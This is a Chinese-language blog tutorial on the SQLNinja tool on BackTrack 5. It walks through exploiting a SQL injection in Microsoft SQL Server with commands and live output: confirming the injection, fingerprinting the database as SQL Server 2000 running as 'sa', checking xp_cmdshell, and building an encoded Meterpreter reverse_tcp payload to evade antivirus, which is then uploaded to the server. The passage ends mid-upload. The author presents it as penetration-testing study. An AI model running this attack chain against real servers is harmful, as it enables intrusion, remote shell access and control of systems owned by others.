最近在学习BackTrack 5下渗透测试,刚好在学习SQLMap和SQLNinja,以下是SQLNinja的用法,SQLMap的用法见之前的博客。[BackTrack=root@perl-exploits:/pentest/database/sqlninja-0.2.3]root@perl-exploits:/pentest/database/sqlninja-0.2.3[/BackTrack]# ./sqlninja -mUsage: ./sqlninja -m <mode> : Required. Available modes are: t/test – test whether the injection is working f/fingerprint – fingerprint user, xp_cmdshell and more b/bruteforce – bruteforce sa account e/escalation – add user to sysadmin server role x/resurrectxp – try to recreate xp_cmdshell u/upload – upload a .scr file s/dirshell – start a direct shell k/backscan – look for an open outbound port r/revshell – start a reverse shell d/dnstunnel – attempt a dns tunneled shell c/sqlcmd – issue a 'blind' OS command m/metasploit – wrapper to Metasploit stagers -f <file> : configuration file (default: sqlninja.conf) -p <password> : sa password -w <wordlist> : wordlist to use in bruteforce mode (dictionary method only) -v : verbose output -d <mode> : activate debug 1 – print each injected command 2 – print each raw HTTP request 3 – print each raw HTTP response all – all of the above …see sqlninja-howto.html for details 上面这么多参数,我们一一解释./sqlninja -m 加载modle下面是一些模块参数-t/test 测试当前模块和配置文件是否工作正常./sqlninja -m testSqlninja rel. 0.2.3Copyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>[+] Parsing configuration file…………….[+] Evasion technique(s):- query hex-encoding- comments as separator- random URI encoding[+] Checking whether the remote server uses SSL[+] The remote server does not talk SSL[+] Target is:[+] Trying to inject a 'waitfor delay'….[+] Injection was successful! Let's rock !!ok,测试成功,表明当前注射点可以识别,存在注入漏洞。
f/fingerprint – fingerprint user, xp_cmdshell and more 这个是判断数据库类型,,当前用户,xpcmdshell是否存在可以用。[BackTrack=root@perl-exploits:/pentest/database/sqlninja-0.2.3]root@perl-exploits:/pentest/database/sqlninja-0.2.3[/BackTrack]# ./sqlninja -m fingerprintSqlninja rel. 0.2.3Copyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>[+] Parsing configuration file…………….[+] Evasion technique(s):- query hex-encoding- comments as separator- random URI encoding[+] Checking whether the remote server uses SSL[+] The remote server does not talk SSL[+] Target is:What do you want to discover ? 0 – Database version (2000/2005) 1 – Database user 2 – Database user rights 3 – Whether xp_cmdshell is working 4 – Whether mixed or Windows-only authentication is used a – All of the above h – Print this menu q – exit>0 检测当前数据库版本1 当前数据库用户2 当前数据库用户权限3 检查xp_cmdshell是否可以用4 是否windows本地系统权限a 检查上面所有的h显示当前帮助菜单1 退出> a[+] Checking SQL Server version… Target: Microsoft SQL Server 2000[+] Checking whether we are sysadmin… We seem to be 'sa'[+] Checking whether xp_cmdshell is available xp_cmdshell seems to be available Mixed authentication seems to be used>m/metasploit 使用metasploit里面的shellcode,这个默认是没有启用的,需要修改sqlninja.conf中metasploit配置位置修改# Path to metasploit executable. Only needed if msfpayload and# msfcli are not already in the pathmsfpath = /pentest/exploits/framework3/ #去掉前面的注释符号,这里修改成你的framework3的安装位置[BackTrack=root@perl-exploits:/pentest/database/sqlninja-0.2.3]root@perl-exploits:/pentest/database/sqlninja-0.2.3[/BackTrack]# ./sqlninja -m metasploitSqlninja rel. 0.2.3Copyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>[+] Parsing configuration file…………….[+] Evasion technique(s):- query hex-encoding- comments as separator- random URI encoding[+] Checking whether the remote server uses SSL[+] The remote server does not talk SSL[+] Target is:[+] Entering Metasploit module. In order to use this module you need tohave found an available TCP port, either inbound or outbound[+] Checking Metasploit3 availability….[+] Which payload you want to use?1: Meterpreter2: VNC>这里执行metasploit,因为调用了metasploit里面的payload,其中有两种方式,一种是Meterpreter,一种是vnc反向链接,如果是在console下面推荐使用Meterpreter,如果是在GNOME或者其他视窗环境下推荐使用VNC,(这里要说一下,必须你机器上要装vncserver,经过测试证实,不能正确的调用metasploit里面的vncserver)OK,我们把两种方法都测试一下。首先执行Meterpreter> 1[+] Which type of connection you want to use?1: bind_tcp2: reverse_tcp>这里要我们选择连接方式,1 是bind_tcp,在服务器上bind一个端口,2.reverse_tcp,反向链接到本地。考虑到服务器上有防火墙之类的,我们一般推荐2,但是如果你没有外网IP或者外网VPN,推荐使用bind_tcp这里我们选择2> 2[+] Enter local port number> 443这里需要我们输入一个本地一个端口,推荐使用未被占用的端口,这里输入443[+] Choose a payload encoding method0 – none1 – Alpha2 Alphanumeric Mixedcase2 – Alpha2 Alphanumeric Uppercase3 – Avoid UTF8/tolower4 – Call+4 Dword XOR5 – Single-byte XOR Countdown6 – Variable-length Fnstenv/mov Dword XOR7 – Polymorphic Jump/Call XOR Additive Feedback8 – Non-Alpha9 – Non-Upper10 – Polymorphic XOR Additive Feedback11 – Alpha2 Alphanumeric Unicode Mixedcase12 – Alpha2 Alphanumeric Unicode Uppercase>这里要你输入shellcode的加密方式,主要是为了避免被服务器上的杀毒软件查杀。这里可根据实际条件选择,我选择0[+] Calling msfpayload3 to create the payload…Created by msfpayload ().Payload: windows/meterpreter/reverse_tcpLength: 278Options: exitfunc=process,lport=443,lhost=211.45.123.200[+] Payload (met50838.exe) created. Now converting it to debug script[+] Uploading /tmp/met50838.scr debug script…………
生活若剥去了理想梦想幻想,那生命便只是一堆空架子
